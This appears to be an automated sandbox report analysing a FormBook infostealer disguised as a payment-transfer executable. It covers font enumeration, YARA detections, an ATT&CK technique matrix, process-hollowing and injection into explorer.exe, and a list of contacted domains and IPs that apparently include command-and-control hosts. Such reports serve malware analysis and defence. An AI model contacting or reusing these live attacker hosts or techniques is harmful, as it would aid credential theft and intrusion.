          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\Payment Transfer Copy of $274,876.00 for the invoice shipments.exe
          Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

          Stealing of Sensitive Information:

          Yara detected FormBook
          Source: Yara match, File source: 00000004.00000002.274205933.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274647874.0000000000B30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.743334604.0000000000750000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.746271126.0000000004850000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000009.00000002.745639709.0000000003090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000004.00000002.274608670.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.237926912.0000000003A19000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3b619d0.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 0.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.3bb65f0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          Yara detected FormBook

          MITRE ATT&CK Matrix

          Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
          Valid Accounts | Shared Modules 1 | Path Interception | Process Injection 612 | Rootkit 1 | Credential API Hooking 1 | Security Software Discovery 221 | Remote Services | Credential API Hooking 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
          Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Masquerading 1 | Input Capture 1 | Virtualization/Sandbox Evasion 3 | Remote Desktop Protocol | Input Capture 1 | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
          Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 3 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Archive Collected Data 1 | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
          Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Disable or Modify Tools 1 | NTDS | Remote System Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap | | Carrier Billing Fraud
          Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 612 | LSA Secrets | System Information Discovery 112 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
          Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
          External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 41 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
          Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 13 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 356535, Sample: Payment Transfer Copy of $2..., Startdate: 23/02/2021, Architecture: WINDOWS, Score: 100

          Signatures on the sample:
          • Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
          • Found malware configuration
          • Malicious sample detected (through community Yara rule)
          • 11 other signatures

          Process chain:
          • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (started)
            Dropped: Payment Transfer C...e shipments.exe.log, ASCII
            Signature: Injects a PE file into a foreign processes
          • Payment Transfer Copy of $274,876.00 for the invoice shipments.exe (started by the process above)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
          • explorer.exe (injected)
            DNS/IP: jaemagreci.com 50.116.112.43, 49736, 80 UNIFIEDLAYER-AS-1US United States; olgadalila.com 198.27.88.111, 49753, 80 OVHFR Canada; 17 other IPs or domains
            Signature: System process connects to network (likely due to code injection or exploit)
          • explorer.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
          • cmd.exe (started)
          • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 25% | Virustotal |
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 28% | ReversingLabs | ByteCode-MSIL.Trojan.Wacatac
          Payment Transfer Copy of $274,876.00 for the invoice shipments.exe | 100% | Joe Sandbox ML |

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          Source | Detection | Scanner | Label
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
          4.2.Payment Transfer Copy of $274,876.00 for the invoice shipments.exe.2b80000.4.unpack | 100% | Avira | TR/Crypt.XPACK.Gen
          9.2.explorer.exe.330000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

          Domains

          Source | Detection | Scanner | Label
          td-balancer-euw2-6-109.wixdns.net | 0% | Virustotal |
          www.zomapa.com | 0% | Virustotal |

          URLs


          Domains and IPs

          Contacted Domains


                                      Contacted URLs


                                      URLs from Memory and Binaries

                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.yoshiyama-potager.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.long9000.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.cvmjqcid.com/blr/www.jaemagreci.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.prodhealth.site/blr/www.stanchilo.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.kanaai.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.yoshiyama-potager.com/blr/explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.na230.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.fontbureau.com/designersGPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                              high
                                              http://www.fontbureau.com/designers/?Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.kathrynbaierling.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.founder.com.cn/cn/bThePayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://www.jaemagreci.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.kathrynbaierling.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://www.fontbureau.com/designers?Payment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  high
                                                  http://www.jasa-software.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.tiro.comexplorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.soheilvaseghi.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://www.goodfont.co.krPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.typography.netDPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.galapagosdesign.com/staff/dennis.htmPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.yoshiyama-potager.comReferer:explorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  http://fontfabrik.comPayment Transfer Copy of $274,876.00 for the invoice shipments.exe, 00000000.00000002.242389629.0000000006BD2000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.259892595.0000000008B40000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://www.stanchilo.comexplorer.exe, 00000005.00000003.559946937.000000000F60C000.00000004.00000001.sdmpfalse
